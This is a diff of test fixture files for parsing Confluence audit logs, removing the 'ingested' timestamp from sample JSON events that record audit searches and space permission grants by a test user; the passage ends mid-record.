@@ -401,7 +397,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837457213Z", "original": "{\"timestamp\":\"2021-11-23T00:41:16.741Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"75 - 174\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.143Z - 2021-11-23T00:41:07.156Z\"}]}", "type": "info", "kind": "event" 
@@ -484,7 +479,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837458194Z", "original": "{\"timestamp\":\"2021-11-23T00:41:07.156Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.128Z\"}]}", "type": "info", "kind": "event" 
@@ -567,7 +561,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837459111Z", "original": "{\"timestamp\":\"2021-11-23T00:41:06.871Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"73 - 172\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.132Z - 2021-11-23T00:40:32.595Z\"}]}", "type": "info", "kind": "event" 
@@ -650,7 +643,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837460033Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.595Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.115Z\"}]}", "type": "info", "kind": "event" 
@@ -733,7 +725,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837461002Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.138Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"71 - 170\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.122Z - 2021-11-23T00:39:37.908Z\"}]}", "type": "info", "kind": "event" 
@@ -826,7 +817,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837461983Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.908Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -926,7 +916,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837462988Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.904Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1026,7 +1015,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837464238Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.899Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1119,7 +1107,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837465215Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.895Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1219,7 +1206,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837466478Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.891Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1319,7 +1305,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837467455Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.887Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1419,7 +1404,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837468383Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.882Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1512,7 +1496,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837469542Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.877Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1612,7 +1595,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837470594Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.872Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1712,7 +1694,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837471911Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.868Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1812,7 +1793,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837473008Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.862Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1905,7 +1885,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837473958Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.858Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2005,7 +1984,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837474991Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.853Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2105,7 +2083,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837475910Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.848Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2205,7 +2182,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837476994Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.841Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2298,7 +2274,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837477906Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.832Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2398,7 +2373,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837478890Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.821Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2498,7 +2472,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837479909Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.811Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test 